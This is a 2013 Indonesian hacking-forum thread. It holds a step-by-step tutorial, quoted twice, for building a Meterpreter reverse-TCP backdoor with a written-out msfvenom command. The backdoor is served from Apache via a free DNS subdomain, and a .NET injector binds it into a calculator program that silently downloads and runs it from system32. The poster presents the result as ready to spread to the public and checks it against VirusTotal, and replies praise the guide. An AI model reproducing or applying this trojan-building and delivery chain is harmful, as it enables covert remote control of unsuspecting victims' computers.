Exploit windows dengan metode .net inzector downloader
#1
[Image: inzektor8_1012_nt__17350.1346897543.1280.1280.jpg]

OK
tutor kali ini akan memperagakan adegan exploit pada ip public

dengan tehnik manipulasi downloader

ok
disni kita kan bekerja menggunakan 2 os untuk membuat exploit yang jitu

backtrack 5r3
dan windows 7

disini ip public saya (attacker) = 125.164.216.221
dan korban (victim) = 180.247.106.236

untuk melihat ip public bisa cek di

http://www.whatismyip.com/

langkah pertama kita buka dulu


buat dulu listener dari terminal backtrack dengan menggunakan perintah

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 LHOST=125.164.216.221 LPORT=4444 >trojanzboy.exe



ganti ip merah dengan ip public kalian

setelah itu terciptalah sebuah backdoor yang saya beri nama trojanzboy.exe pada directory root

[Image: Selection_001.png]

setelah itu pindah hasil backdoor tadi pada directory /var/www

[Image: Selection_002.png]

setelah di pindah
sekarang masuk router dan forward ip local kalian pada router
masukkan port 4444 dan 80 untuk listener dan apache
disini ip local saya 192.168.1.12

[Image: Selection_003.png]

setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start

kalau sudah selesai saatnya membungkus ip public saatnya membuat domain pada http://freedns.afraid.org/
kalau belum punya id daftarkan dulu ya

setelah daftar langsung masuk subdomain klik add

[Image: Selection_011.png]


setelah selesai save

setelah tersimpan saatnya buka terminal lalu masuk metasploit

msfconsole

dan masukkan exploit multi/handler dan exploit

[Image: Selection_004.png]

sekarang copy file backdoor yang telah di buat ada pada /var/www pada OS windows


download tool inzectornya dulu untuk windows --> https://dl.dropboxusercontent.com/s/czq2...LqXRg&dl=1


lalu ekstrak hasil download
ok buka program inzector lalu klik load dan masukkan program calculator / program .net kalian disini saya contohkan calculator saja lalu open


[Image: Capture.PNG]

setelah itu klik
program >> klik 2x main

dan pada menu downloader masukkan alamat domain yang kita buat pada http://freedns.afraid.org/ disini domain saya http://narutoupdate.strangled.net/ dan INGAT nama backdoor yang telah kita copy pada folder /var/www disini backdoor nya saya namakan trojanzboy.exe maka hasil urlnya
adalah

http://narutoupdate.strangled.net/trojanzboy.exe

dan isi downloader path = hasil downloadnya saya taruh di system32 dan saya beri nama test dan klik inject

dan tentukan letak hasil output


[Image: Capture.PNG]

disini saya beri nama trojanzboycrypted.exe dan
saya taruh di desktop

[Image: Capture.PNG]


maka file ini siap disebarin ke public
kita scan dengan virustotal

[Image: Capture.PNG]

dan jika file trojanzboycrypted.exe ini di jalankan maka program akan mendownload file dari http://narutoupdate.strangled.net/trojanzboy.exe dan meletakkan expoit pada \windows\system32\test.exe dan program .net calculator pun ikut jalan


[Image: Capture.PNG]

dan balik ke backtrack os dan apa yang terjadi sesi meterpreter pun exploit sukses terbuka juga . . .

[Image: Selection_005.png]

(07-14-2013, 10:58 PM)TrojanzBoy Wrote:

OK
tutor kali ini akan memperagakan adegan exploit pada ip public

dengan tehnik manipulasi downloader

ok
disni kita kan bekerja menggunakan 2 os untuk membuat exploit yang jitu

backtrack 5r3
dan windows 7

disini ip public saya (attacker) = 125.164.216.221
dan korban (victim) = 180.247.106.236

untuk melihat ip public bisa cek di

/

langkah pertama kita buka dulu


buat dulu listener dari terminal backtrack dengan menggunakan perintah

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 LHOST=125.164.216.221 LPORT=4444 >trojanzboy.exe



ganti ip merah dengan ip public kalian

setelah itu terciptalah sebuah backdoor yang saya beri nama trojanzboy.exe pada directory root



setelah itu pindah hasil backdoor tadi pada directory /var/www



setelah di pindah
sekarang masuk router dan forward ip local kalian pada router
masukkan port 4444 dan 80 untuk listener dan apache
disini ip local saya 192.168.1.12



setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start

kalau sudah selesai saatnya membungkus ip public saatnya membuat domain pada /
kalau belum punya id daftarkan dulu ya

setelah daftar langsung masuk subdomain klik add




setelah selesai save

setelah tersimpan saatnya buka terminal lalu masuk metasploit

msfconsole

dan masukkan exploit multi/handler dan exploit



sekarang copy file backdoor yang telah di buat ada pada /var/www pada OS windows


download tool inzectornya dulu untuk windows --> https://dl.dropboxusercontent.com/s/czq2...LqXRg&dl=1


lalu ekstrak hasil download
ok buka program inzector lalu klik load dan masukkan program calculator / program .net kalian disini saya contohkan calculator saja lalu open




setelah itu klik
program >> klik 2x main

dan pada menu downloader masukkan alamat domain yang kita buat pada / disini domain saya / dan INGAT nama backdoor yang telah kita copy pada folder /var/www disini backdoor nya saya namakan trojanzboy.exe maka hasil urlnya
adalah

/trojanzboy.exe

dan isi downloader path = hasil downloadnya saya taruh di system32 dan saya beri nama test dan klik inject

dan tentukan letak hasil output




disini saya beri nama trojanzboycrypted.exe dan
saya taruh di desktop




maka file ini siap disebarin ke public
kita scan dengan virustotal



dan jika file trojanzboycrypted.exe ini di jalankan maka program akan mendownload file dari /trojanzboy.exe secara sient otomatis dan meletakkan expoit pada \windows\system32\test.exe dan program .net calculator pun ikut jalan




dan balik ke backtrack os dan apa yang terjadi sesi meterpreter pun exploit sukses terbuka juga . . .


#2
kak masuk router itu gimana kak kog gak bisa ... router kand modem dah tak masukin user ama pass nya tapi kug muncul "http://192.168.1.1/cgi-bin/webcm?getpage=../html/frame.htm"

#3
Thumbs Up 
wah keren nich tutor y :-bd:-bd:-bd:-bd

tp klo pke modem stik (USB) kira" cara setting NAT y gmn yah ?:-?:-?:-?:-?:-?

#4
Nice share ... ijin icip mas bro
Quote:~ Tan Hana Wighna Tan Sirna ~

#5
bolehh di coba neh, tp msh bner2 pengguna baru Big Grin





Users browsing this thread: 1 Guest(s)